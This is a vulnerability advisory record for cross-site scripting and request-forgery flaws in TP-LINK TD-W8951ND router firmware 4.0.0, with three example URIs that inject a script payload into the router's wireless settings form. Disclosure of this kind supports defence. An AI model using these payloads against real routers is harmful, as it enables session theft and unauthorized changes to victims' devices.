ID
VAR-E-201308-0523
TITLE
TP-LINK TD-W8951ND Router Cross Site Scripting and Cross Site Request Forgery Vulnerabilities
Trust: 0.3
DESCRIPTION
TP-LINK TD-W8951ND router is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.
An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information. Other attacks may also be possible.
TP-Link TD-W8951ND running firmware 4.0.0 Build 120607.Rel.30923 is vulnerable; other versions may also be affected.
Trust: 0.3
AFFECTED PRODUCTS
| vendor: | tp link | model: | td-w8951nd build 120607.r | scope: | eq | version: | 4.0.0 | Trust: 0.3 |
EXPLOIT
To exploit these issues an attacker must entice an unsuspecting victim into following a malicious URI.
The following example URIs are available:
http://www.example.com/Forms/home_wlan_1?wlanWEBFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://www.example.com/Forms/home_wlan_1?AccessFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://www.example.com/Forms/home_wlan_1?wlan_APenable=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Input Validation Error
Trust: 0.3
CREDITS
xistence
Trust: 0.3
EXTERNAL IDS
| db: | BID | id: | 62103 | Trust: 0.3 |
REFERENCES
| url: | http://www.tp-link.us/support/download/?pcid=203&model=td-w8951nd | Trust: 0.3 |
SOURCES
| db: | BID | id: | 62103 |
LAST UPDATE DATE
2022-07-27T09:42:50.168000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 62103 | date: | 2013-08-30T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 62103 | date: | 2013-08-30T00:00:00 |